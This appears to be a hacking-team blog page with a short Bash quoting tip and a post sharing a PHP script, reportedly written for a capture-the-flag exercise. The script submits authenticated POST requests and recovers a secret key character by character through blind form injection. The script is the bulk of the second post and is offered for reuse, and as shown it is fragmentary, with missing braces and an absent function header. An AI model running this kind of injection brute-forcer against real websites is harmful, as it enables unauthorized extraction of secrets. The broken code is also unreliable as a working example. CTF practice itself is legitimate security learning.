TILFH: Quotes and When to Use Them

One thing that always confuses me when I’m writing Bash scripts is what type of quote to use in a given situation. Luckily, Hermit schooled me with this quick rundown:

“SOMETHING” = This means evaluate what’s between the quotes.

‘SOMETHING’ = This means don’t evaluate what’s between the quotes. This is a literal string.

`SOMETHING`= This means execute the stuff between the quotes and spit out the result. NOTE: These little back quotes are hard to find. Look on the tilde key.

$(SOMETHING) = Same as above.

– Killswitch

Quick PHP Injector

Just posting this for anyone that may need something similar in the future.  The below is my quick code that I use to brute force/programmatically assess form injection.  I wrote it when working through (CTF NAME REDACTED).  If it helps, enjoy.  Please attribute appropriately if you repurpose it, however.

// Name: PHP-Injector-Template
// Author: Brian Mork (Hermit)
// Last Modified: 2016-04-08

// This version assumes basic authentication and POST method
$options = array(
     'http' => array(
          'header' => "Content-type: application/x-www-form-urlencodedrnAuthorization: Basic " . base64_encode("$leveluser:$levelpass"),
          'method' => 'POST',
          'content' => http_build_query($testpush)

// Build the context for the request using all of the above
$context = stream_context_create($options);

// Actually submit it
$result = file_get_contents($url, false, $context);

// Check for a failed connection state (just in case)
if ($result === FALSE) {
     print "Failed to connect\n\n";
} else {
// Look for "INDICATOR" which indicates successful injection and return based upon that...
     if (preg_match("/INDICATOR/", $result)) {
          return $trialdata;
     } else {
          return null;

// Zeroize the recovery key
$recoverkey = '';

// Build an array which is [A-Za-z0-9]
// Modify as appropriate for other use cases
$allchars = array_merge(range('A', 'Z'), range('a', 'z'), range(0, 9));

// List how many characters to limit the search to
$loopcount = 123;
// Loop through and test
foreach ( range(1, $loopcount) as $looper ) {
     $breakflag = 'FALSE';
     foreach( $allchars as $onechar) {
          // Bypass method to avoid unnecessary tries
          if ($breakflag === 'FALSE') {
               // We need to track the single character separately from the injection test
               // so the below builds the test portion
               $testkey = $recoverkey . $onechar;
               // Check it using the above function
               $poscheck = post_data($testkey);
               // If we didn't get null, it was good... let me know!
               if ($poscheck !== null) {
                    $breakflag = 'TRUE';
                    $recoverkey .= $onechar;
                    echo "\nFound new position! Current recovery is: " . $recoverkey . "\n";
               } else {
                    // I just like to see that it's still working
                    echo ".";

// Once we've reached the full number of characters, break and print the key
print "Found key of: " . $recoverkey . "\n\n";


Website Powered by WordPress.com.

Up ↑